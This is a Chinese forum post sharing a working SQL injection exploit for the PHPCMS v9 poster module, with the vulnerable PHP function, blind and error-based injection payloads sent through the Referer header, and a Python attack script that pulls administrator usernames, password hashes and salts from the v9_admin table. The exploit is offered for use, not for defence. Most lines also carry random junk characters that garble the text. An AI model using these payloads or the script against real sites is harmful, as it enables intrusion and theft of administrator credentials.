有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:& V, i: i4 _& g$ \& g0 m# j4 f! U
- n" q. ~/ V3 _8 Y
问题函数\phpcms\modules\poster\index.php! ]5 ^% f- g% r, u
4 Q) ]2 T# |, {public function poster_click() {
1 W4 L0 D5 f3 Q$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
5 g w* ]7 I' F/ N M$r = $this->db->get_one(array('id'=>$id));. {% n/ @; z' c) L8 R8 g7 L$ n
if (!is_array($r) && empty($r)) return false;5 c6 @& ~2 S9 d( |! a/ ]
$ip_area = pc_base::load_sys_class('ip_area');
M; {* P& [0 c, t$ip = ip();
5 w0 d+ o& h1 Y/ }3 s1 I& t$area = $ip_area->get($ip);+ R+ Z* Z7 n. O/ Q, S9 j
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
+ }' p) @# G- c7 t' o' Iif($id) {0 D/ B% e1 Z1 P+ l! K7 K
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();( D9 C2 E5 z! G; S2 g& F
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
' s u, j) u0 T: ^& h; O6 k}. L/ E6 D5 \+ a9 V. ^$ k
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));, k1 |" B# M% Z: H0 V
$setting = string2array($r['setting']);3 u) D# M: ~* q' M6 J) D, P
if (count($setting)==1) {, r! A/ V! U+ W" O; T2 V) b) p
$url = $setting['1']['linkurl'];9 }4 M8 m5 f3 Y& [' ^ e% P
} else {5 f8 c2 i9 e6 L1 h3 p) a
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
: u* h# e$ p3 j, }}$ ?% B ], M/ t9 ?* V
header('Location: '.$url);# L3 K& _6 L) W) ]3 r
}( w/ J- \" ]' `+ c3 P
1 t% Q X+ D d8 h" T% o8 C
E+ p; n# _, ^ E6 W% V4 _1 l. U" J/ ^# m8 @
利用方式:
) f+ i# u/ L- W7 A/ s
+ I, E# R* n* y9 c/ I$ q1、可以采用盲注入的手法: A, X+ `5 N4 g
: K3 U% s5 H( a areferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#' v( a1 [: V O8 |
, f3 D4 t% W) ~$ G( a
通过返回页面,正常与否一个个猜解密码字段。
! N& M, d" B3 ~; w( y
4 e2 H) X/ Y+ d+ r. D: `3 T c2、代码是花开写的,随手附上了:
$ u) ]: M$ e3 [
/ \0 G* i' |4 @1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#& o! p- C: k$ S% p6 Y0 |7 J
9 o2 c2 G; S, C/ y$ W! H4 b此方法是爆错注入手法,原理自查。
) q5 v6 [+ P# ?% j! U3 j2 _% F) |; G4 R
( `+ M! h# a2 M! u; V
# l- A6 n+ |7 ]4 Y$ B. B利用程序: D2 @& _: `) g6 X' G
) A! t( C3 C9 a! \
#!/usr/bin/env python
4 M; r8 L4 v, Simport httplib,sys,re# h# d8 n" ]: v
' ~ c$ k. d4 n7 Y2 K) ?3 M8 Hdef attack():9 f0 L% L6 g' A2 i9 A9 o
print “Code by Pax.Mac Team conqu3r!”
/ X. a! q8 M/ A# H8 R( e) o( J/ ^print “Welcome to our zone!!!”5 t6 Y* ]; R' \9 L
url=sys.argv[1]
' m! a0 C! Y ^& Ppaths=sys.argv[2]
, |* p7 H+ R- T' ?( O* R; Y* \7 M8 xconn = httplib.HTTPConnection(url)
3 G |' e1 T$ C Fi_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,6 |& R" q0 ?) D2 g4 f% |
“Accept”: “text/plain”,
w0 @2 i2 }1 |6 W! E7 b“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}3 u! J7 I: M$ \
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
- a+ {8 B3 s: |: w' Er1 = conn.getresponse()2 ^5 [( N' a0 W
datas=r1.read()% r# D1 @" p- D. H8 l9 Y
datas=re.findall(r”Duplicate entry \’\w+’”, datas)$ B# n1 v/ M) m; Z1 x
print datas[0]
' i% S$ s: f s" J/ cconn.close()! d8 ?% o' e( f& K0 k) O
if __name__==”__main__”:
1 g {/ c! \$ c! y( Iif len(sys.argv)<3:
2 F+ x0 I" ?. D0 Kprint “Code by Pax.Mac Team conqu3r”! a% v# M2 ?/ c) A& a
print “Usgae:”& B; G3 g2 j* j. P, I
print “ phpcmsattack.py www.paxmac.org /”
& \6 w. V' s3 g- w' ?print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”0 u4 K5 N, z) }* G& J! \7 ^3 a4 E8 H
sys.exit(1)
0 W$ I$ X# |) Iattack()7 b/ [: C+ _5 C0 Q
/ `) |8 r% [, O2 E: Q/ z
|
发表于 2013-1-11 21:01:00
收藏
支持
反对